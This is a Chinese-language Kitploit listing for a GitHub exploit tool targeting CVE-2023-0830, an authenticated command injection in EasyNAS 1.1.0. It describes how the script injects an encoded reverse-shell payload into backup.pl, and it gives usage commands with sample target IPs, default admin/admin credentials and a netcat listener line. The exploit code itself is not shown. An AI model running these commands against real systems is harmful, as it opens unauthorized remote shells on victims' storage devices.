Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/xbz0n/cve-2023-0830
Payload生成漏洞利用Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubxbz0n/cve-2023-0830

CVE-2023-0830

针对 EasyNAS 1.1.0 版本的利用工具。所利用的漏洞是一个命令注入缺陷,需要身份验证。

查看仓库
1111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-0830: EasyNAS 1.1.0 认证后 OS 命令注入漏洞利用

这个 Python 脚本是针对 EasyNAS 1.1.0 版本的强大利用工具,具有增强功能,包括集成监听器。所利用的漏洞是一个命令注入缺陷,需要认证。

脚本与目标服务器建立会话,然后使用用户提供的凭据发送登录请求。成功认证后,脚本构造一个有效载荷,执行时打开一个反向 shell 连接到用户指定的 IP 和端口。该有效载荷经过 URL 和 Base64 编码,然后通过精心构造的 GET 请求注入到服务器上的 backup.pl 文件中。

CVE: CVE-2023-0830

漏洞利用作者

Ivan Spiridonov (xbz0n) https://xbz0n.sh

厂商主页

https://www.easynas.org

特性

  • 集成反向 shell 监听器 - 无需单独的 netcat 进程
  • 监听器自动 IP 地址检测
  • 可选择不同的 shell 类型(bash, sh, python)
  • 支持 HTTP 和 HTTPS
  • 支持外部监听器

用法

基本用法(集成监听器,推荐):

root@kitploit:~
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin

使用外部监听器(首先启动 nc -lvnp 4444):

root@kitploit:~
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444

选项:

root@kitploit:~
--mode {shell,reverse}    利用模式:shell(集成反向 shell)或 reverse(外部监听器)
--lhost IP_ADDRESS        反向 shell 监听器的 IP 地址(默认为自动检测)
--lport PORT              反向 shell 监听器的端口(默认:4444)
--protocol {http,https}   使用的协议(默认:https)
--verbose                 启用详细输出
--shell {bash,sh,python}  指定与集成监听器一起使用的 shell 类型(默认:bash)

依赖项

  • Python 3
  • Requests 库

免责声明

此脚本仅用于教育目的和授权渗透测试。在针对任何网络或系统运行渗透测试之前,务必获得明确许可。

请负责任地使用。

下载工具